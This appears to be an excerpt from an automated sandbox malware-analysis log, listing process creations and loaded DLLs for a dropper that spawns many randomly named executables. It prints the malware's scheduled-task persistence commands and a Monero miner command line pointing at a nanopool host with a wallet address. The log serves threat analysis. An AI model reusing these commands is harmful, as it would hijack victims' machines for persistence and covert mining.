                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe "C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe "C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe "C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe "C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe "C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe "C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe "C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe "C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe "C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe "C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /FJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe "C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe "C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe "C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe "C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe "C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe "C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe "C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe "C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe "C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: unknown unknownJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: perfos.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxx.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: nvapi64.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
